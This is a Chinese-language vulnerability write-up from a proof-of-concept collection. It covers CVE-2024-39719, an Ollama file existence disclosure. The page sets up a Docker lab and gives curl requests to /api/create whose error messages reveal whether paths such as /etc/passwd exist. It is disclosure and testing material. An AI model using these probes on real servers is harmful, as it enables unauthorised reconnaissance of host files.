admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-09 04:47:31 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/人工智能漏洞/Ollama 文件存在性泄露漏洞 CVE-2024-39719.md
Threekiii f73d5f6046 update CVE-2024-39719
2025-03-10 16:59:35 +08:00

85 lines
2.6 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Ollama 文件存在性泄露漏洞 CVE-2024-39719
## 漏洞描述
Ollama 0.3.14 及之前的版本中,攻击者可以通过 `api/create` 端点触发文件存在性泄露File Existence Disclosure漏洞。当调用 `CreateModel` 并传递一个不存在的路径参数时,服务器会直接返回 `"File does not exist"`(文件不存在)的错误消息。该漏洞允许攻击者探测服务器上特定文件是否存在,进而造成信息泄露。
参考链接:
- https://github.com/advisories/GHSA-cpxh-jwhh-m496
- https://oligosecurity.webflow.io/blog/more-models-more-probllms
- https://github.com/ollama/ollama/releases/tag/v0.1.47
- https://github.com/ollama/ollama/blob/cb42e607c5cf4d439ad4d5a93ed13c7d6a09fc34/server/images.go#L349
## 漏洞影响
```
Ollama ≤ 0.3.14
```
## 环境搭建
docker-compose.yml
```
services:
ollama:
image: ollama/ollama:0.3.14
container_name: ollama
volumes:
- ollama:/root/.ollama
ports:
- "11434:11434"
volumes:
ollama:
```
执行如下命令启动 Ollama 0.3.14 服务:
```
docker compose up -d
```
环境启动后,访问 `http://your-ip:11434/`,此时 Ollma 0.3.14 已经成功运行。
![](images/Ollama%20文件存在性泄露漏洞%20CVE-2024-39719/image-20250305134942768.png)
## 漏洞复现
使用 `curl` 命令向本地服务器发送请求,创建一个名为 `file-leak-existence` 的文件。
文件不存在时,将报错 `no such file or directory`
```
curl "http://your-ip:11434/api/create" -d '{"name": "file-leak-existence","path": "/tmp/non-existing"}'
-----
{"error":"error reading modelfile: open /tmp/non-existing: no such file or directory"}
```
![](images/Ollama%20文件存在性泄露漏洞%20CVE-2024-39719/image-20250305135226934.png)
文件存在时,将报错 `command must be one of "from", "license", "template", "system", "adapter", "parameter", or "message"`
```
curl "http://your-ip:11434/api/create" -d '{"name": "file-leak-existence","path": "/etc/passwd"}'
-----
{"error":"command must be one of \"from\", \"license\", \"template\", \"system\", \"adapter\", \"parameter\", or \"message\""}% e
```
![](images/Ollama%20文件存在性泄露漏洞%20CVE-2024-39719/image-20250305135433566.png)
传入目录而非文件路径时候,将报错 `{"error":"read /xxx: is a directory"}`
```
curl "http://your-ip:11434/api/create" -d '{"name": "file-leak-existence","path": "/etc"}'
-----
{"error":"read /etc: is a directory"}%
```
![](images/Ollama%20文件存在性泄露漏洞%20CVE-2024-39719/image-20250305135606639.png)
## 漏洞修复
- 升级至最新版本 https://github.com/ollama/ollama
Reference in New Issue View Git Blame Copy Permalink